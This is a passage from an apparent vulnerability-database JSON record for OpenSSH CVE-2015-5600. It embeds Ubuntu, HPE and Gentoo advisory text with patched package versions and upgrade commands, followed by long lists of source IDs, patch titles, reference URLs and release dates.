respective owners. ============================================================================\nUbuntu Security Notice USN-2710-2\nAugust 18, 2015\n\nopenssh regression\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.04\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nUSN-2710-1 introduced a regression in OpenSSH. The upstream fix for\nCVE-2015-5600 caused a regression resulting in random authentication\nfailures in non-default configurations. This update fixes the problem. \n\nOriginal advisory details:\n\n Moritz Jodeit discovered that OpenSSH incorrectly handled usernames when\n using PAM authentication. If an additional vulnerability were discovered in\n the OpenSSH unprivileged child process, this issue could allow a remote\n attacker to perform user impersonation. (CVE number pending)\n Moritz Jodeit discovered that OpenSSH incorrectly handled context memory\n when using PAM authentication. If an additional vulnerability were\n discovered in the OpenSSH unprivileged child process, this issue could\n allow a remote attacker to bypass authentication or possibly execute\n arbitrary code. (CVE number pending)\n Jann Horn discovered that OpenSSH incorrectly handled time windows for\n X connections. (CVE-2015-5352)\n It was discovered that OpenSSH incorrectly handled keyboard-interactive\n authentication. \n (CVE-2015-5600)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.04:\n openssh-server 1:6.7p1-5ubuntu1.3\n\nUbuntu 14.04 LTS:\n openssh-server 1:6.6p1-2ubuntu2.3\n\nUbuntu 12.04 LTS:\n openssh-server 1:5.9p1-5ubuntu1.7\n\nIn general, a standard system update will make all the necessary changes. \n\nReferences:\n http://www.ubuntu.com/usn/usn-2710-2\n http://www.ubuntu.com/usn/usn-2710-1\n https://launchpad.net/bugs/1485719\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/openssh/1:6.7p1-5ubuntu1.3\n https://launchpad.net/ubuntu/+source/openssh/1:6.6p1-2ubuntu2.3\n https://launchpad.net/ubuntu/+source/openssh/1:5.9p1-5ubuntu1.7\n. \nVCX prior to 9.8.18 with OpenSSH or ISC BIND. \n\n+ VCX 9.8.18 for the following Products/SKUs:\n\n - J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr\n - J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr\n - JC517A HP VCX V7205 Platform w/DL 360 G6 Server\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JC516A HP VCX V7005 Platform w/DL 120 G6 Server\n - JC518A HP VCX Connect 200 Primry 120 G6 Server\n - J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr\n - JE341A HP VCX Connect 100 Secondary\n - JE252A HP VCX Connect Primary MIM Module\n - JE253A HP VCX Connect Secondary MIM Module\n - JE254A HP VCX Branch MIM Module\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod\n - JD023A HP MSR30-40 Router with VCX MIM Module\n - JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM\n - JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod\n - JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod\n - JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod\n - JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS\n - JE340A HP VCX Connect 100 Pri Server 9.0\n - JE342A HP VCX Connect 100 Sec Server 9.0\n\nHISTORY\nVersion:1 (rev.1) - 28 January 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201512-04\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSH: Multiple vulnerabilities\n Date: December 20, 2015\n Bugs: #553724, #555518, #557340\n ID: 201512-04\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSH, the worst of which\ncould lead to arbitrary code execution, or cause a Denial of Service\ncondition. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/openssh \u003c 7.1_p1-r2 \u003e= 7.1_p1-r2\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in OpenSSH. Please review\nthe CVE identifiers referenced below for details. \n\nImpact\n======\n\n\n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSH users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/openssh-6.9_p1-r2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-5352\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5352\n[ 2 ] CVE-2015-5600\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5600\n[ 3 ] CVE-2015-6563\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6563\n[ 4 ] CVE-2015-6564\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6564\n[ 5 ] CVE-2015-6565\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6565\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201512-04\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2015 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-5600"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003969"
},
{
"db": "BID",
"id": "75990"
},
{
"db": "VULMON",
"id": "CVE-2015-5600"
},
{
"db": "PACKETSTORM",
"id": "137294"
},
{
"db": "PACKETSTORM",
"id": "132875"
},
{
"db": "PACKETSTORM",
"id": "133087"
},
{
"db": "PACKETSTORM",
"id": "136977"
},
{
"db": "PACKETSTORM",
"id": "133130"
},
{
"db": "PACKETSTORM",
"id": "135505"
},
{
"db": "PACKETSTORM",
"id": "135009"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-5600",
"trust": 3.5
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2015/07/23/4",
"trust": 2.5
},
{
"db": "BID",
"id": "75990",
"trust": 2.0
},
{
"db": "MCAFEE",
"id": "SB10157",
"trust": 1.7
},
{
"db": "MCAFEE",
"id": "SB10136",
"trust": 1.7
},
{
"db": "BID",
"id": "92012",
"trust": 1.7
},
{
"db": "BID",
"id": "91787",
"trust": 1.7
},
{
"db": "SIEMENS",
"id": "SSA-412672",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1032988",
"trust": 1.7
},
{
"db": "JUNIPER",
"id": "JSA10697",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003969",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201508-001",
"trust": 0.6
},
{
"db": "JUNIPER",
"id": "JSA10774",
"trust": 0.3
},
{
"db": "MCAFEE",
"id": "SB10164",
"trust": 0.3
},
{
"db": "ICS CERT",
"id": "ICSA-22-349-21",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2015-5600",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "137294",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "132875",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "133087",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "136977",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "133130",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "135505",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "135009",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2015-5600"
},
{
"db": "BID",
"id": "75990"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003969"
},
{
"db": "PACKETSTORM",
"id": "137294"
},
{
"db": "PACKETSTORM",
"id": "132875"
},
{
"db": "PACKETSTORM",
"id": "133087"
},
{
"db": "PACKETSTORM",
"id": "136977"
},
{
"db": "PACKETSTORM",
"id": "133130"
},
{
"db": "PACKETSTORM",
"id": "135505"
},
{
"db": "PACKETSTORM",
"id": "135009"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-001"
},
{
"db": "NVD",
"id": "CVE-2015-5600"
}
]
},
"id": "VAR-201508-0620",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.4615448
},
"last_update_date": "2024-07-22T22:56:58.009000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006",
"trust": 0.8,
"url": "http://lists.apple.com/archives/security-announce/2015/aug/msg00001.html"
},
{
"title": "HT205031",
"trust": 0.8,
"url": "https://support.apple.com/en-us/ht205031"
},
{
"title": "HT205031",
"trust": 0.8,
"url": "https://support.apple.com/ja-jp/ht205031"
},
{
"title": "CVS log for src/usr.bin/ssh/auth2-chall.c",
"trust": 0.8,
"url": "http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/auth2-chall.c"
},
{
"title": "Diff for /src/usr.bin/ssh/auth2-chall.c between version 1.42 and 1.43",
"trust": 0.8,
"url": "http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/auth2-chall.c.diff?r1=1.42\u0026r2=1.43\u0026f=h"
},
{
"title": "Oracle Critical Patch Update Advisory - July 2016",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
},
{
"title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html"
},
{
"title": "Oracle Solaris Third Party Bulletin - October 2015",
"trust": 0.8,
"url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html"
},
{
"title": "July 2016 Critical Patch Update Released",
"trust": 0.8,
"url": "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update"
},
{
"title": "OpenSSH\u306e\u8106\u5f31\u6027(CVE-2015-5600)\u306b\u3088\u308bBIG-IP1500\u3078\u306e\u5f71\u97ff\u306b\u3064\u3044\u3066",
"trust": 0.8,
"url": "http://www.hitachi.co.jp/products/it/server/security/info/vulnerable/openssh_cve20155600_big.html"
},
{
"title": "auth2-chall",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=57086"
},
{
"title": "Red Hat: Moderate: openssh security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152088 - security advisory"
},
{
"title": "Debian CVElist Bug Report Logs: openssh: CVE-2015-5352: XSECURITY restrictions bypass under certain conditions in ssh",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=cb1cb0a27af47a61a0356f0de0943be8"
},
{
"title": "Debian CVElist Bug Report Logs: openssh: CVE-2015-5600: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=6ddb8aa51aaa09b7fbd5a473e33cd0f9"
},
{
"title": "Ubuntu Security Notice: openssh vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2710-1"
},
{
"title": "Ubuntu Security Notice: openssh regression",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2710-2"
},
{
"title": "Red Hat: CVE-2015-5600",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-5600"
},
{
"title": "Debian CVElist Bug Report Logs: openssh: CVE-2015-6563 CVE-2015-6564",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=73eb91ff53511af2767cd29878bd74dc"
},
{
"title": "Amazon Linux AMI: ALAS-2015-625",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-625"
},
{
"title": "Symantec Security Advisories: SA104 : OpenSSH Vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=b643e473a764678a8d1ded300d5699b6"
},
{
"title": "Oracle Linux Bulletins: Oracle Linux Bulletin - April 2016",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=83bbd91f8369c8f064e6d68dac68400f"
},
{
"title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - July 2016",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489"
},
{
"title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - July 2016",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=6c15273f6bf4a785175f27073b98a1ce"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - July 2018",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=5f8c525f1408011628af1792207b2099"
},
{
"title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2015",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=92308e3c4d305e91c2eba8c9c6835e83"
},
{
"title": "Final_Project_CyberBootcamp",
"trust": 0.1,
"url": "https://github.com/pboonman196/final_project_cyberbootcamp "
},
{
"title": "IDS-Evasion",
"trust": 0.1,
"url": "https://github.com/ahm3dhany/ids-evasion "
},
{
"title": "clair-lab",
"trust": 0.1,
"url": "https://github.com/sjourdan/clair-lab "
},
{
"title": "DC-2-Vulnhub-Walkthrough",
"trust": 0.1,
"url": "https://github.com/vshaliii/dc-2-vulnhub-walkthrough "
},
{
"title": "DC-1-Vulnhub-Walkthrough",
"trust": 0.1,
"url": "https://github.com/vshaliii/dc-1-vulnhub-walkthrough "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2015-5600"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003969"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-001"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-003969"
},
{
"db": "NVD",
"id": "CVE-2015-5600"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://openwall.com/lists/oss-security/2015/07/23/4"
},
{
"trust": 2.0,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
},
{
"trust": 2.0,
"url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
},
{
"trust": 2.0,
"url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html"
},
{
"trust": 1.9,
"url": "http://www.ubuntu.com/usn/usn-2710-1"
},
{
"trust": 1.8,
"url": "https://security.gentoo.org/glsa/201512-04"
},
{
"trust": 1.8,
"url": "http://www.ubuntu.com/usn/usn-2710-2"
},
{
"trust": 1.7,
"url": "http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/auth2-chall.c.diff?r1=1.42\u0026r2=1.43\u0026f=h"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2015/jul/92"
},
{
"trust": 1.7,
"url": "http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/auth2-chall.c"
},
{
"trust": 1.7,
"url": "http://lists.apple.com/archives/security-announce/2015/aug/msg00001.html"
},
{
"trust": 1.7,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-july/162955.html"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht205031"
},
{
"trust": 1.7,
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05157667"
},
{
"trust": 1.7,
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05128992"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/91787"
},
{
"trust": 1.7,
"url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html"
},
{
"trust": 1.7,
"url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/75990"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/92012"
},
{
"trust": 1.7,
"url": "http://rhn.redhat.com/errata/rhsa-2016-0466.html"
},
{
"trust": 1.7,
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10157"
},
{
"trust": 1.7,
"url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04952480"
},
{
"trust": 1.7,
"url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10697"
},
{
"trust": 1.7,
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10136"
},
{
"trust": 1.7,
"url": "http://lists.opensuse.org/opensuse-security-announce/2015-09/msg00017.html"
},
{
"trust": 1.7,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-august/165170.html"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id/1032988"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20151106-0001/"
},
{
"trust": 1.7,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2018/09/msg00010.html"
},
{
"trust": 1.7,
"url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1174-security-advisory-12"
},
{
"trust": 1.7,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-5600"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-5600"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-5600"
},
{
"trust": 0.3,
"url": "http://seclists.org/oss-sec/2015/q3/156"
},
{
"trust": 0.3,
"url": "http://seclists.org/bugtraq/2015/jul/134"
},
{
"trust": 0.3,
"url": "http://seclists.org/bugtraq/2015/jul/141"
},
{
"trust": 0.3,
"url": "http://www.openssh.com"
},
{
"trust": 0.3,
"url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10774\u0026actp=rss"
},
{
"trust": 0.3,
"url": "http://prod.lists.apple.com/archives/security-announce/2015/aug/msg00001.html"
},
{
"trust": 0.3,
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04952480"
},
{
"trust": 0.3,
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05157667"
},
{
"trust": 0.3,
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05128992"
},
{
"trust": 0.3,
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10164"
},
{
"trust": 0.3,
"url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099240"
},
{
"trust": 0.3,
"url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098977"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21969670"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980969"
},
{
"trust": 0.3,
"url": "http://www.hitachi.co.jp/products/it/server/security/global/info/vulnerable/openssh_cve20155600_big.html"
},
{
"trust": 0.3,
"url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n"
},
{
"trust": 0.3,
"url": "http://www.hpe.com/support/security_bulletin_archive"
},
{
"trust": 0.3,
"url": "http://www.hpe.com/support/subscriber_choice"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-5352"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/264.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2015:2088"
},
{
"trust": 0.1,
"url": "https://github.com/pboonman196/final_project_cyberbootcamp"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/2710-1/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-5600"
},
{
"trust": 0.1,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=40178"
},
{
"trust": 0.1,
"url": "http://h20564.www2.hpe.com/hpsc/swd/public"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-3194"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-0705"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-5161"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-1789"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0800"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-2842"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-1791"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799"
},
{
"trust": 0.1,
"url": "https://www.freebsd.org/handbook/makeworld.html\u003e."
},
{
"trust": 0.1,
"url": "https://security.freebsd.org/\u003e."
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-5600\u003e"
},
{
"trust": 0.1,
"url": "https://security.freebsd.org/patches/sa-15:16/openssh.patch.asc"
},
{
"trust": 0.1,
"url": "https://security.freebsd.org/patches/sa-15:16/openssh.patch"
},
{
"trust": 0.1,
"url": "https://security.freebsd.org/patches/sa-15:16/openssh-8-errata.patc"
},
{
"trust": 0.1,
"url": "https://security.freebsd.org/patches/sa-15:16/openssh-8-errata.patch.asc"
},
{
"trust": 0.1,
"url": "https://security.freebsd.org/advisories/freebsd-sa-15:16.openssh.asc\u003e"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2653\u003e"
},
{
"trust": 0.1,
"url": "https://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-2653"
},
{
"trust": 0.1,
"url": "https://security.freebsd.org/patches/sa-15:16/openssh-8.patch.asc"
},
{
"trust": 0.1,
"url": "https://security.freebsd.org/patches/sa-15:16/openssh-8.patch"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openssh/1:5.9p1-5ubuntu1.6"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openssh/1:6.7p1-5ubuntu1.2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openssh/1:6.6p1-2ubuntu2.2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openssh/1:5.9p1-5ubuntu1.7"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openssh/1:6.6p1-2ubuntu2.3"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openssh/1:6.7p1-5ubuntu1.3"
},
{
"trust": 0.1,
"url": "https://launchpad.net/bugs/1485719"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-5477"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-5722"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-5352"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-6565"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-6565"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-6563"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-6564"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-5600"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-6563"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-6564"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2015-5600"
},
{
"db": "BID",
"id": "75990"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003969"
},
{
"db": "PACKETSTORM",
"id": "137294"
},
{
"db": "PACKETSTORM",
"id": "132875"
},
{
"db": "PACKETSTORM",
"id": "133087"
},
{
"db": "PACKETSTORM",
"id": "136977"
},
{
"db": "PACKETSTORM",
"id": "133130"
},
{
"db": "PACKETSTORM",
"id": "135505"
},
{
"db": "PACKETSTORM",
"id": "135009"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-001"
},
{
"db": "NVD",
"id": "CVE-2015-5600"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2015-5600"
},
{
"db": "BID",
"id": "75990"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003969"
},
{
"db": "PACKETSTORM",
"id": "137294"
},
{
"db": "PACKETSTORM",
"id": "132875"
},
{
"db": "PACKETSTORM",
"id": "133087"
},
{
"db": "PACKETSTORM",
"id": "136977"
},
{
"db": "PACKETSTORM",
"id": "133130"
},
{
"db": "PACKETSTORM",
"id": "135505"
},
{
"db": "PACKETSTORM",
"id": "135009"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-001"
},
{
"db": "NVD",
"id": "CVE-2015-5600"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-08-03T00:00:00",
"db": "VULMON",
"id": "CVE-2015-5600"
},
{
"date": "2015-07-22T00:00:00",
"db": "BID",
"id": "75990"
},
{
"date": "2015-08-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-003969"
},
{
"date": "2016-06-02T16:22:00",
"db": "PACKETSTORM",
"id": "137294"
},
{
"date": "2015-07-28T22:22:22",
"db": "PACKETSTORM",
"id": "132875"
},
{
"date": "2015-08-14T20:53:10",
"db": "PACKETSTORM",
"id": "133087"
},
{
"date": "2016-05-12T16:07:26",
"db": "PACKETSTORM",
"id": "136977"
},
{
"date": "2015-08-18T22:29:09",
"db": "PACKETSTORM",
"id": "133130"
},
{
"date": "2016-01-29T20:34:00",
"db": "PACKETSTORM",
"id": "135505"
},
{
"date": "2015-12-21T23:23:00",
"db": "PACKETSTORM",
"id": "135009"
},
{
"date": "2015-08-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-001"
},
{
"date": "2015-08-03T01:59:03.950000",
"db": "NVD",
"id": "CVE-2015-5600"
}
]
},
"sources_update_date": {
"@context": {
